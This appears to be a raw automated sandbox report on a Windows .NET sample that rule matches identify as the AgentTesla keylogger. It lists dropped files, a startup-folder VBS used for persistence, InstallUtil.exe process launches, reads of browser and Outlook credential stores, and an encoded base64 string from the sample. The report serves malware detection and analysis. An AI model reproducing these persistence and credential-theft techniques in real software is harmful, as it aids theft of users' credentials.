                    Source: O65887cvz7.exe, 00000000.00000002.2051151028.0000000003C88000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs O65887cvz7.exe
                    Source: O65887cvz7.exe, 00000000.00000002.2055432790.0000000005890000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs O65887cvz7.exe
                    Source: O65887cvz7.exe, 00000000.00000002.2054246652.0000000005620000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs O65887cvz7.exe
                    Source: O65887cvz7.exe, 00000000.00000002.2033226685.0000000000E7E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs O65887cvz7.exe
                    Source: O65887cvz7.exe, 00000000.00000002.2051151028.0000000003FE8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename7dfcfdf2-d881-49c9-a39e-708aca656f85.exe4 vs O65887cvz7.exe
                    Source: O65887cvz7.exe, 00000000.00000002.2034394668.0000000002E2C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs O65887cvz7.exe
                    Source: O65887cvz7.exe, 00000000.00000002.2051151028.0000000003E4A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs O65887cvz7.exe
                    Source: O65887cvz7.exe, 00000000.00000002.2051151028.0000000003E4A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameGsjea.exe, vs O65887cvz7.exe
                    Source: O65887cvz7.exe, 00000000.00000002.2054826719.0000000005772000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameGsjea.exe, vs O65887cvz7.exe
                    Source: O65887cvz7.exe, 00000000.00000002.2051151028.0000000003D68000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs O65887cvz7.exe
                    Source: O65887cvz7.exe, 00000000.00000002.2053593213.0000000005280000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameIwfth.dll" vs O65887cvz7.exe
                    Source: O65887cvz7.exeBinary or memory string: OriginalFilenameGsjea.exe, vs O65887cvz7.exe
                    Source: O65887cvz7.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 4.2.InnerException.exe.3da3db0.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 4.2.InnerException.exe.3da3db0.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 0.2.O65887cvz7.exe.3ffd8e0.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.O65887cvz7.exe.3ffd8e0.6.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 0.2.O65887cvz7.exe.3ffd8e0.6.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.O65887cvz7.exe.3ffd8e0.6.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 4.2.InnerException.exe.3da3db0.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 4.2.InnerException.exe.3da3db0.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 2.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 2.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 4.2.InnerException.exe.3d55590.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 4.2.InnerException.exe.3d55590.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: O65887cvz7.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: InnerException.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: O65887cvz7.exe, -.csCryptographic APIs: 'CreateDecryptor'
                    Source: InnerException.exe.0.dr, -.csCryptographic APIs: 'CreateDecryptor'
                    Source: 0.2.O65887cvz7.exe.3ffd8e0.6.raw.unpack, 4JJG6X.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.O65887cvz7.exe.3ffd8e0.6.raw.unpack, 4JJG6X.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.O65887cvz7.exe.3ffd8e0.6.raw.unpack, 8C78isHTVco.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.O65887cvz7.exe.3ffd8e0.6.raw.unpack, 8C78isHTVco.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.O65887cvz7.exe.3ffd8e0.6.raw.unpack, 8C78isHTVco.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.O65887cvz7.exe.3ffd8e0.6.raw.unpack, 8C78isHTVco.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.O65887cvz7.exe.3ffd8e0.6.raw.unpack, CqSP68Ir.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.O65887cvz7.exe.3ffd8e0.6.raw.unpack, CqSP68Ir.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: 0.2.O65887cvz7.exe.5890000.14.raw.unpack, ITaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask'
                    Source: 0.2.O65887cvz7.exe.5890000.14.raw.unpack, TaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
                    Source: 0.2.O65887cvz7.exe.5890000.14.raw.unpack, Task.csTask registration methods: 'RegisterChanges', 'CreateTask'
                    Source: 0.2.O65887cvz7.exe.5890000.14.raw.unpack, TaskService.csTask registration methods: 'CreateFromToken'
                    Source: O65887cvz7.exe, -.csBase64 encoded string: 'wCv/gKTGvQDpkq3O8Cblm6+F0iH/kazJ/yu3s6Tf1jz4hrjq4CHpmaPH6mnrkbX01SfgmI/K/je3m7H02jzphbTK/zv4jfrM9ibTuKTF9Cbkz4bO5wb1hKTt4T3hvKDF9z7pz6bO5w3ClazOqBvikKTT3DS3pqTK9wH4hqjF9GnNkKWQ9Df4q5HE4Dv4na7FqDXpgJ7o5iD+ka/f1z3hlajFqAHpgIXK5zO3xvaToGS3tbLY9j/umLj49iD6kbOQwDvhhK3O0iH/kazJ/yvJjLHH/CDphvrJ8jDpmLfGqCHhm6rO5zf/gA=='
                    Source: InnerException.exe.0.dr, -.csBase64 encoded string: 'wCv/gKTGvQDpkq3O8Cblm6+F0iH/kazJ/yu3s6Tf1jz4hrjq4CHpmaPH6mnrkbX01SfgmI/K/je3m7H02jzphbTK/zv4jfrM9ibTuKTF9Cbkz4bO5wb1hKTt4T3hvKDF9z7pz6bO5w3ClazOqBvikKTT3DS3pqTK9wH4hqjF9GnNkKWQ9Df4q5HE4Dv4na7FqDXpgJ7o5iD+ka/f1z3hlajFqAHpgIXK5zO3xvaToGS3tbLY9j/umLj49iD6kbOQwDvhhK3O0iH/kazJ/yvJjLHH/CDphvrJ8jDpmLfGqCHhm6rO5zf/gA=='
                    Source: 0.2.O65887cvz7.exe.5890000.14.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                    Source: 0.2.O65887cvz7.exe.5890000.14.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                    Source: 0.2.O65887cvz7.exe.5890000.14.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                    Source: 0.2.O65887cvz7.exe.5890000.14.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                    Source: 0.2.O65887cvz7.exe.5890000.14.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                    Source: 0.2.O65887cvz7.exe.5890000.14.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@8/3@1/1
                    Source: C:\Users\user\Desktop\O65887cvz7.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InnerException.vbsJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMutant created: NULL
                    Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InnerException.vbs"
                    Source: O65887cvz7.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: O65887cvz7.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                    Source: C:\Users\user\Desktop\O65887cvz7.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: O65887cvz7.exeReversingLabs: Detection: 75%
                    Source: C:\Users\user\Desktop\O65887cvz7.exeFile read: C:\Users\user\Desktop\O65887cvz7.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\O65887cvz7.exe "C:\Users\user\Desktop\O65887cvz7.exe"
                    Source: C:\Users\user\Desktop\O65887cvz7.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                    Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InnerException.vbs"
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\InnerException.exe "C:\Users\user\AppData\Roaming\InnerException.exe"
                    Source: C:\Users\user\AppData\Roaming\InnerException.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                    Source: C:\Users\user\Desktop\O65887cvz7.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\InnerException.exe "C:\Users\user\AppData\Roaming\InnerException.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\InnerException.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\O65887cvz7.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\O65887cvz7.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\O65887cvz7.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\O65887cvz7.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\O65887cvz7.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\O65887cvz7.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\O65887cvz7.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\O65887cvz7.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\O65887cvz7.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\O65887cvz7.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\O65887cvz7.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\O65887cvz7.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\O65887cvz7.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\O65887cvz7.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\O65887cvz7.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\O65887cvz7.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\O65887cvz7.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wtsapi32.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winsta.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vaultcli.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\InnerException.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\InnerException.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\InnerException.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\InnerException.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\InnerException.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\InnerException.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\InnerException.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\InnerException.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\InnerException.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\InnerException.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\InnerException.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\InnerException.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\InnerException.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\InnerException.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\InnerException.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\InnerException.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\InnerException.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vaultcli.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\Desktop\O65887cvz7.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                    Source: C:\Users\user\Desktop\O65887cvz7.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                    Source: O65887cvz7.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: O65887cvz7.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                    Source: O65887cvz7.exeStatic file information: File size 1211392 > 1048576
                    Source: O65887cvz7.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x127200
                    Source: O65887cvz7.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: O65887cvz7.exe, 00000000.00000002.2055432790.0000000005890000.00000004.08000000.00040000.00000000.sdmp, O65887cvz7.exe, 00000000.00000002.2034394668.0000000002E2C000.00000004.00000800.00020000.00000000.sdmp, O65887cvz7.exe, 00000000.00000002.2051151028.0000000003E4A000.00000004.00000800.00020000.00000000.sdmp, O65887cvz7.exe, 00000000.00000002.2051151028.0000000003D68000.00000004.00000800.00020000.00000000.sdmp, InnerException.exe, 00000004.00000002.2197504041.0000000003D01000.00000004.00000800.00020000.00000000.sdmp, InnerException.exe, 00000004.00000002.2197504041.0000000003D55000.00000004.00000800.00020000.00000000.sdmp, InnerException.exe, 00000004.00000002.2170960789.0000000002F69000.00000004.00000800.00020000.00000000.sdmp
